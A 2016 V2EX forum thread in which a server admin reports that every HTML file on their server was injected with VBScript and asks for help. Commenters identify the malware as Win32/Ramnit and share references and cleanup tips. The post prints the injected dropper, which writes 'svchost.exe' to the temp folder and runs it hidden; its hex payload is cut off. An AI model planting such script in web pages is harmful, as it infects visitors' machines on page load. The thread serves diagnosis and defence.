大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript

2016 年 1 月 12 日
 blakefan

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

安全不懂啊,懂的 v 友指教一下

6133 次点击
所在节点    服务器
13 条回复
zhanglp888
2016 年 1 月 12 日
Win32/Ramnit
https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fRamnit

dll 文件也会有问题,
hicdn
2016 年 1 月 12 日
这个是在服务器上看到的还是在浏览器里看到的
akafeng
2016 年 1 月 12 日
这是运行一个文件, svchost.exe, 目测是木马
bigtan
2016 年 1 月 12 日
中过这个病毒
Moker
2016 年 1 月 12 日
前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点
hienchu
2016 年 1 月 12 日
怎么被入侵的?
ibcker
2016 年 1 月 12 日
等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 vbscript
am241
2016 年 1 月 12 日
这种病毒十年前就不好用了吧
billyu
2016 年 1 月 12 日
我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7
maskerTUI
2016 年 1 月 12 日
/t/248061
visonme
2016 年 1 月 12 日
https://www.abuse.ch/?p=2842

对你了解这种类别的病毒有帮助
blakefan
2016 年 1 月 12 日
网页木马程序
prondtoo
2016 年 1 月 29 日
刚弄好 nexpose ,有需要可以帮你扫一下。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/250050

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX